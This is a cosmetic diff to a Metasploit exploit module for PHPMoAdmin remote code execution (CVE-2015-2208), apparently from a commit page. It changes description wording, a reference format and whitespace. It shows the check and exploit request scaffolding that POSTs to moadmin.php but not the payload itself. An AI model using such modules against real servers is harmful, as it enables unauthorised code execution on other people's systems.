@@ -11,7 +11,7 @@ def initialize(info = {})
11
11
super ( update_info ( info ,
12
12
'Name' => 'PHPMoAdmin Remote Code Execution' ,
13
13
'Description' => %q{
14
- This module exploits an arbitrary PHP command execution vulnerability because of a
14
+ This module exploits an arbitrary PHP command execution vulnerability due to a
15
15
dangerous use of eval() in PHPMoAdmin.
16
16
} ,
17
17
'Author' =>
@@ -23,7 +23,7 @@ def initialize(info = {})
23
23
'References' =>
24
24
[
25
25
[ 'CVE' , '2015-2208' ] ,
26
- [ 'URL ' , 'http://www.exploit-db.com/exploits/ 36251/ ' ] ,
26
+ [ 'EDB ' , '36251' ] ,
27
27
[ 'URL' , 'http://seclists.org/fulldisclosure/2015/Mar/19' ] ,
28
28
[ 'URL' , 'http://seclists.org/oss-sec/2015/q1/743' ]
29
29
] ,
@@ -45,7 +45,7 @@ def initialize(info = {})
45
45
46
46
def check
47
47
res = send_request_cgi ( {
48
- 'uri' => normalize_uri ( target_uri . to_s , 'moadmin.php' ) ,
48
+ 'uri' => normalize_uri ( target_uri . to_s , 'moadmin.php' ) ,
49
49
'method' => 'POST' ,
50
50
'vars_post' =>
51
51
{
@@ -65,7 +65,7 @@ def exploit
65
65
print_status ( "Executing payload..." )
66
66
67
67
res = send_request_cgi ( {
68
- 'uri' => normalize_uri ( target_uri . to_s , 'moadmin.php' ) ,
68
+ 'uri' => normalize_uri ( target_uri . to_s , 'moadmin.php' ) ,
69
69
'method' => 'POST' ,
70
70
'vars_post' =>
71
71
{
@@ -78,3 +78,4 @@ def exploit
78
78
79
79
end
80
80
end
81
+
0 commit comments